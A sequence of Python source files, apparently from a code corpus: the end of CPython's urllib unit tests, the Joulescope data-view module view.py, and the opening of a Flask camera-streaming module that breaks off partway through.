def test_read_bogus(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp('''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(IOError, urllib.urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises IOError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp('')
try:
self.assertRaises(IOError, urllib.urlopen, 'http://something')
finally:
self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to makes sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(test_support.TESTFN)
self.text = 'testing urllib.urlretrieve'
try:
FILE = file(test_support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
return "file://%s" % urllib.pathname2url(os.path.abspath(filePath))
def createNewTempFile(self, data=""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.urlretrieve("file:%s" % test_support.TESTFN)
self.assertEqual(result[0], test_support.TESTFN)
self.assert_(isinstance(result[1], mimetools.Message),
"did not get a mimetools.Message instance as second "
"returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.urlretrieve(self.constructLocalFileUrl(
test_support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assert_(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = file(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(count, block_size, total_size, count_holder=[0]):
self.assert_(isinstance(count, int))
self.assert_(isinstance(block_size, int))
self.assert_(isinstance(total_size, int))
self.assertEqual(count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.urlretrieve(self.constructLocalFileUrl(test_support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile()
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read). Since the block size is 8192 bytes, only one block read is
# required to read the entire file.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 5)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 8193)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 8193)
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 ("Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>. The Python
code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly.
Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %s != %s" % (do_not_quote, result))
result = urllib.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %s != %s" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.quote.func_defaults[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %s != %s" % (quote_by_default, result))
result = urllib.quote_plus(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %s != %s" %
(quote_by_default, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): %s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %s != %s" % (expected, result))
self.assertEqual(expected, result,
"using quote_plus(): %s != %s" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %s != %s" % (result, hexescape(' ')))
result = urllib.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %s != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.quote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %s != %s" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using quote(): not all characters escaped; %s" %
result)
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquote_with_unicode(self):
r = urllib.unquote(u'br%C3%BCckner_sapporo_20050930.doc')
self.assertEqual(r, u'br\xc3\xbcckner_sapporo_20050930.doc')
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.urlencode(given)
for expected in expect_somewhere:
self.assert_(expected in result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assert_(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.quote_plus(str(['1', '2', '3']))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
result = urllib.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assert_(expect in result,
"%s not found in %s" % (expect, result))
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathnam2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.quote("quot=ing")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.quote("make sure")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.URLopener):
def open_spam(self, url):
return url
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# Just commented them out.
# Can't really tell why keep failing in windows and sparc.
# Everywhere else they work ok, but on those machines, someteimes
# fail in one of the tests, sometimes in other. I have a linux, and
# the tests go ok.
# If anybody has one of the problematic enviroments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen(5)
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assert_(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assert_(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
def test_main():
import warnings
with warnings.catch_warnings():
warnings.filterwarnings('ignore', ".*urllib\.urlopen.*Python 3.0",
DeprecationWarning)
test_support.run_unittest(
urlopen_FileTests,
urlopen_HttpTests,
urlretrieve_FileTests,
ProxyTests,
QuotingTests,
UnquotingTests,
urlencode_Tests,
Pathname_Tests,
URLopener_Tests,
#FTPWrapperTests,
)
if __name__ == '__main__':
test_main()
|
view.py | # Copyright 2018-2019 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from joulescope import span
from joulescope.stream_buffer import StreamBuffer, stats_to_api, \
stats_array_factory, stats_array_invalidate
import threading
import queue
import numpy as np
import logging
TIMEOUT = 10.0
def data_array_to_update(x_limits, x, data_array):
"""Convert raw data buffer to a view update.
:param x_limits: The list of [x_min, x_max] or None if unknown.
:param x: The np.ndarray of x-axis times.
:param data_array: The np.ndarray((N, STATS_FIELD_COUNT), dtype=STATS_DTYPE)
"""
if len(x):
s = stats_to_api(data_array[0, :], float(x[0]), float(x[-1]))
else:
s = stats_to_api(None, 0.0, 0.0)
s['time']['x'] = {'value': x, 'units': 's'}
s['time']['limits'] = {'value': x_limits, 'units': 's'}
s['state'] = {'source_type': 'buffer'} # ['realtime', 'buffer']
for idx, signal in enumerate(s['signals'].values()):
signal['µ']['value'] = data_array[:, idx]['mean'].copy()
length = data_array[:, idx]['length'] - 1
length[length < 1] = 1.0
signal['σ2']['value'] = data_array[:, idx]['variance'] / length
signal['min']['value'] = data_array[:, idx]['min'].copy()
signal['max']['value'] = data_array[:, idx]['max'].copy()
signal['p2p']['value'] = signal['max']['value'] - signal['min']['value']
return s
class View:
def __init__(self, stream_buffer, calibration):
"""Create a new view instance.
:param stream_buffer: The stream buffer providing the data.
:param calibration: The device calibration data structure.
"""
self._state = 'idle'
self._stream_buffer = None
self._calibration = calibration
self._x = None
self._data = None # [N, STATS_FIELD_COUNT]
self._x_range = [0.0, 1.0] # the initial default range
self._samples_per = 1
self._data_idx = 0
self._span = None
self._changed = True
self._stream_notify_available = False # flag when stream_notify called
self._refresh_requested = False
self._log = logging.getLogger(__name__)
self._thread = None
self._closing = False
self._cmd_queue = queue.Queue() # tuples of (command, args, callback)
self._response_queue = queue.Queue()
self.on_update_fn = None # callable(data)
self._quit = False
self.on_close = None # optional callable() on close
if stream_buffer is not None:
self._stream_buffer_assign(stream_buffer)
def _stream_buffer_assign(self, stream_buffer):
if self._stream_buffer == stream_buffer:
return
self._stream_buffer = stream_buffer
self._x_range = list(self._stream_buffer.limits_time) # the initial default range
length = len(self)
if length <= 0:
length = 100
# todo : investigate - may want inclusive max time (not exclusive) -- off by 1 error?
self._span = span.Span(limits=self._stream_buffer.limits_time,
quant=1.0 / self.sampling_frequency,
length=length)
def __len__(self):
if self._data is None:
return 0
return self._data.shape[0]
@property
def sampling_frequency(self):
"""The output sampling frequency."""
if self._stream_buffer is None:
return None
return self._stream_buffer.output_sampling_frequency
@property
def calibration(self):
"""The device calibration."""
return self._calibration
@property
def limits(self):
"""Get the (x_min, x_max) limits for the view."""
if self._span is not None:
return list(self._span.limits)
return None
def _cmd_process(self, cmd, args):
rv = None
try:
# self._log.debug('_cmd_process %s - start', cmd)
if cmd == 'stream_notify':
rv = self._stream_notify(stream_buffer=args)
elif cmd == 'refresh':
if bool(args['force']):
self._log.debug('view refresh(force=True) requested')
self._update()
else:
self._refresh_requested = True
elif cmd == 'on_x_change':
rv = self._on_x_change(*args)
elif cmd == 'samples_get':
rv = self._samples_get(**args)
elif cmd == 'statistics_get':
rv = self._statistics_get(**args)
elif cmd == 'statistics_get_multiple':
rv = self._statistics_get_multiple(**args)
elif cmd == 'start':
rv = self._start()
elif cmd == 'stop':
rv = self._stop()
elif cmd == 'ping':
return args
elif cmd == 'close':
self._quit = True
else:
self._log.warning('unsupported command %s', cmd)
except:
self._log.exception('While running command')
# self._log.debug('_cmd_process %s - done', cmd)
return rv
def _run(self):
cmd_count = 0
timeout = 1.0
self._log.info('View.run start')
while not self._quit:
try:
cmd, args, cbk = self._cmd_queue.get(timeout=timeout)
except queue.Empty:
timeout = 1.0
if cmd_count and self._refresh_requested and (self._changed or self._stream_notify_available):
self._update()
cmd_count = 0
continue
except Exception:
self._log.exception('Exception during View _cmd_queue get')
continue
cmd_count += 1
timeout = 0.0
rv = self._cmd_process(cmd, args)
if callable(cbk):
try:
cbk(rv)
except:
self._log.exception('in callback')
self._data = None
self._log.info('View.run done')
def _post(self, command, args=None, cbk=None):
if self._thread is None:
self._log.info('View._post(%s) when thread not running', command)
else:
self._cmd_queue.put((command, args, cbk))
def _post_block(self, command, args=None, timeout=None):
timeout = TIMEOUT if timeout is None else float(timeout)
# self._log.debug('_post_block %s start', command)
while not self._response_queue.empty():
self._log.warning('response queue not empty')
try:
self._response_queue.get(timeout=0.0)
except queue.Empty:
pass
if self._thread is None:
raise IOError('View thread not running')
self._post(command, args, lambda rv_=None: self._response_queue.put(rv_))
try:
rv = self._response_queue.get(timeout=timeout)
except queue.Empty as ex:
self._log.error('view thread hung: %s - FORCE CLOSE', command)
self._join()
rv = ex
except Exception as ex:
rv = ex
if isinstance(rv, Exception):
raise IOError(rv)
# self._log.debug('_post_block %s done', command) # rv
return rv
def _update_from_buffer(self):
buffer = self._stream_buffer
if buffer is None:
return
length = len(self)
data_idx_view_end, sample_id_end, delta = self._view()
if self._data is None:
return
elif not self._changed and 0 == delta:
return
elif self._changed or delta >= length: # perform full recompute
stats_array_invalidate(self._data)
if data_idx_view_end > 0:
start_idx = (data_idx_view_end - length) * self._samples_per
# self.log.debug('recompute(start=%s, stop=%s, increment=%s)', start_idx, sample_id_end, self.samples_per)
buffer.data_get(start_idx, sample_id_end, self._samples_per, self._data)
elif data_idx_view_end > 0:
start_idx = self._data_idx * self._samples_per
# self.log.debug('update(start=%s, stop=%s, increment=%s)', start_idx, sample_id_end, self.samples_per)
self._data = np.roll(self._data, -delta, axis=0)
buffer.data_get(start_idx, sample_id_end, self._samples_per, self._data[-delta:, :])
else:
stats_array_invalidate(self._data)
self._data_idx = data_idx_view_end
self._changed = False
def _update(self):
if not callable(self.on_update_fn):
return
self._update_from_buffer()
if self._data is None:
data = None
else:
data = data_array_to_update(self.limits, self._x, self._data)
if self._state != 'idle':
data['state']['source_type'] = 'realtime'
self._stream_notify_available = False
self._refresh_requested = False
try:
self.on_update_fn(data)
except Exception:
self._log.exception('in on_update_fn')
def _clear(self):
self._changed = True
self._refresh_requested = True
self._data_idx = 0
if self._data is not None:
stats_array_invalidate(self._data)
def _start(self):
self._log.debug('start')
self._clear()
self._state = 'streaming'
def _stop(self):
self._log.debug('start')
self._state = 'idle'
def _on_x_change(self, cmd, kwargs):
x_range = list(self._x_range) # copy
if cmd == 'resize': # {pixels: int}
length = kwargs['pixels']
if length is not None and length != len(self):
self._log.info('resize %s', length)
self._span.length = length
self._data = stats_array_factory(length)
self._changed = True # invalidate
x_range, self._samples_per, self._x = self._span.conform_discrete(x_range)
elif cmd == 'span_absolute': # {range: (start: float, stop: float)}]
x_range, self._samples_per, self._x = self._span.conform_discrete(kwargs.get('range'))
elif cmd == 'span_relative': # {center: float, gain: float}]
x_range, self._samples_per, self._x = self._span.conform_discrete(
x_range, gain=kwargs.get('gain'), pivot=kwargs.get('pivot'))
elif cmd == 'span_pan':
delta = kwargs.get('delta', 0.0)
x_range = [x_range[0] + delta, x_range[-1] + delta]
x_range, self._samples_per, self._x = self._span.conform_discrete(x_range)
elif cmd == 'refresh':
self._log.warning('on_x_change(refresh)')
self._changed = True
return
else:
self._log.warning('on_x_change(%s) unsupported', cmd)
return
if self._state == 'streaming':
x_max = self._span.limits[1]
if x_range[1] < x_max:
x_shift = x_max - x_range[1]
x_range = [x_range[0] + x_shift, x_max]
x_range, self._samples_per, self._x = self._span.conform_discrete(x_range)
self._changed |= (self._x_range != x_range)
self._clear()
self._x_range = x_range
self._log.info('changed=%s, length=%s, span=%s, range=%s, samples_per=%s',
self._changed, len(self), self._x_range,
self._x_range[1] - self._x_range[0], self._samples_per)
if self._state == 'idle':
self._stream_notify(self._stream_buffer)
def _view(self):
buffer = self._stream_buffer
_, sample_id_end = buffer.sample_id_range
lag_time = self._span.limits[1] - self._x_range[1]
lag_samples = int(lag_time * self.sampling_frequency) // self._samples_per
data_idx_stream_end = sample_id_end // self._samples_per
data_idx_view_end = data_idx_stream_end - lag_samples
sample_id_end = data_idx_view_end * self._samples_per
delta = data_idx_view_end - self._data_idx
return data_idx_view_end, sample_id_end, delta
def time_to_sample_id(self, t):
return self._stream_buffer.time_to_sample_id(t)
def sample_id_to_time(self, s):
return self._stream_buffer.sample_id_to_time(s)
def _stream_notify(self, stream_buffer):
self._stream_buffer = stream_buffer
self._stream_notify_available = True
def _convert_time_to_samples(self, x, units):
if units is None or units == 'seconds':
return self.time_to_sample_id(x)
elif units == 'samples':
return int(x)
else:
raise ValueError(f'unsupported units {units}')
def _convert_time_range_to_samples(self, start, stop, units):
length = len(self)
data_idx_view_end, sample_id_end, delta = self._view()
start_idx = (data_idx_view_end - length) * self._samples_per
if start is None and units == 'seconds':
start = start_idx
else:
start = self._convert_time_to_samples(start, units)
if stop is None and units == 'seconds':
stop = data_idx_view_end * self._samples_per
else:
stop = self._convert_time_to_samples(stop, units)
return start, stop
def _samples_get(self, start=None, stop=None, units=None, fields=None):
s1, s2 = self._convert_time_range_to_samples(start, stop, units)
self._log.debug('_samples_get(start=%r, stop=%r, units=%s) -> %s, %s', start, stop, units, s1, s2)
return self._stream_buffer.samples_get(start=s1, stop=s2, fields=fields)
def _statistics_get(self, start=None, stop=None, units=None):
"""Get the statistics for the collected sample data over a time range.
:return: The statistics data structure.
See the :`statistics documentation <statistics.html>`_
for details on the data format.
"""
s1, s2 = self._convert_time_range_to_samples(start, stop, units)
# self._log.debug('buffer %s, %s, %s => %s, %s', start, stop, units, s1, s2)
d , x_range = self._stream_buffer.statistics_get(start=s1, stop=s2)
t_start = x_range[0] / self.sampling_frequency
t_stop = x_range[1] / self.sampling_frequency
return stats_to_api(d, t_start, t_stop)
def _statistics_get_multiple(self, ranges, units=None, source_id=None):
return [self._statistics_get(x[0], x[1], units=units) for x in ranges]
def open(self):
"""Open the view and run the thread."""
self.close()
self._log.info('open')
self._closing = False
self._thread = threading.Thread(name='view', target=self._run)
self._thread.start()
self._post_block('ping')
return
def start(self, stream_buffer: StreamBuffer):
"""Start streaming."""
self._post_block('start')
def stop(self):
"""Stop streaming."""
if self._thread is not None:
self._post_block('stop')
def _join(self, timeout=None):
timeout = TIMEOUT if timeout is None else timeout
if not self._closing:
self._closing = True
self._post('close', None, None)
if self._thread:
# thread can safely join() multiple times
self._thread.join(timeout=timeout)
self._thread = None
def close(self):
"""Close the view and stop the thread."""
if self._thread is not None:
self._log.info('close')
self._join()
on_close, self.on_close = self.on_close, None
if callable(on_close):
try:
on_close()
except Exception:
self._log.exception('view.on_close')
self._stream_buffer = None
def refresh(self, force=None):
return self._post('refresh', {'force': force})
def on_x_change(self, cmd, kwargs):
self._post('on_x_change', (cmd, kwargs))
def stream_notify(self, stream_buffer):
self._post('stream_notify', stream_buffer)
def samples_get(self, start=None, stop=None, units=None, fields=None):
"""Get exact samples over a range.
:param start: The starting time.
:param stop: The ending time.
:param units: The units for start and stop.
'seconds' or None is in floating point seconds relative to the view.
'samples' is in stream buffer sample indicies.
:param fields: The fields to get. None (default) gets the fundamental
fields available for this view instance, which may vary depending
upon the backend.
"""
args = {'start': start, 'stop': stop, 'units': units, 'fields': fields}
return self._post_block('samples_get', args)
def statistics_get(self, start=None, stop=None, units=None, callback=None):
"""Get statistics over a range.
:param start: The starting time.
:param stop: The ending time.
:param units: The units for start and stop.
'seconds' or None is in floating point seconds relative to the view.
'samples' is in stream buffer sample indices.
:param callback: The optional callable. When provided, this method will
not block and the callable will be called with the statistics
data structure from the view thread.
:return: The statistics data structure or None if callback is provided.
Note: this same format is used by the
:meth:`Driver.statistics_callback_register`.
See the `statistics documentation <statistics.html>`_
for details on the data format.
"""
args = {'start': start, 'stop': stop, 'units': units}
if callback is None:
return self._post_block('statistics_get', args)
else:
self._post('statistics_get', args=args, cbk=callback)
return None
def statistics_get_multiple(self, ranges, units=None, callback=None, source_id=None):
args = {'ranges': ranges, 'units': units, 'source_id': source_id}
if callback is None:
return self._post_block('statistics_get_multiple', args)
else:
self._post('statistics_get_multiple', args=args, cbk=callback)
return None
def ping(self, *args, **kwargs):
"""Ping the thread.
:param args: The positional arguments.
:param kwargs: The keyword arguments.
:return: (args, kwargs) after passing through the thread.
"""
return self._post_block('ping', (args, kwargs))
|
videoManager.py | from flask import Response, request, abort
from _thread import get_ident
from .setting import serverConfig, streamConfig
from .tokenManager import Auth
from camera_dev import CameraDevice
import cv2, threading, time
class LiveVideo:
placeholder = cv2.imencode('.jpg',
cv2.resize(cv2.imread(streamConfig.PLACEHOLDER),
(CameraDevice.WIDTH, CameraDevice.HEIGHT),
interpolation=cv2.INTER_AREA))[1].tobytes()
thread = None
frame = None
frameId = 0
lastTime = 0
lock = threading.Lock()
signal = dict()
@classmethod
def StartThread(cls):
with cls.lock:
if cls.thread is None:
cls.lastTime = time.time()
cls.thread = threading.Thread(target=cls.CaptureTask)
cls.thread.start()
cls.EventWait()
cls.EventClear()
@classmethod
def GetFrame(cls):
cls.lastTime = time.time()
cls.EventWait()
cls.EventClear()
if cls.frameId == -1:
return cls.placeholder
else:
return cls.frame
@classmethod
def CaptureTask(cls):
while True:
try:
ret, img = CameraDevice.device.read()
img = cv2.flip(img, 0)
cls.frame = cv2.imencode('.jpg', img, [cv2.IMWRITE_JPEG_QUALITY, streamConfig.QUALITY])[1].tobytes()
cls.frameId = 1
except:
cls.frameId = -1
finally:
cls.EventSet()
time.sleep(0.04)
if streamConfig.TIMEOUT > 0 and time.time() - cls.lastTime > streamConfig.TIMEOUT:
cls.frame = None
cls.frameId = 0
cls.thread = None
break
@classmethod
def EventSet(cls):
nowTime = time.time()
rm = None
for id, ev in cls.signal.items():
if not ev[0].isSet():
ev[0].set()
ev[1] = nowTime
elif nowTime - ev[1] > streamConfig.THREAD_TIMEOUT:
rm = id
if rm:
del cls.signal[rm]
@classmethod
def EventWait(cls):
ident = get_ident()
if ident not in cls.signal:
cls.signal[ident] = [threading.Event(), time.time()]
cls.signal[ident][0].wait()
@classmethod
def EventClear(cls):
cls.signal[get_ident()][0].clear()
def GenVideo():
for _ in range(2):
yield b'--frame\r\nContent-Type: image/jpeg\r\n\r\n' + LiveVideo.placeholder + b'\r\n'
if LiveVideo.thread is None:
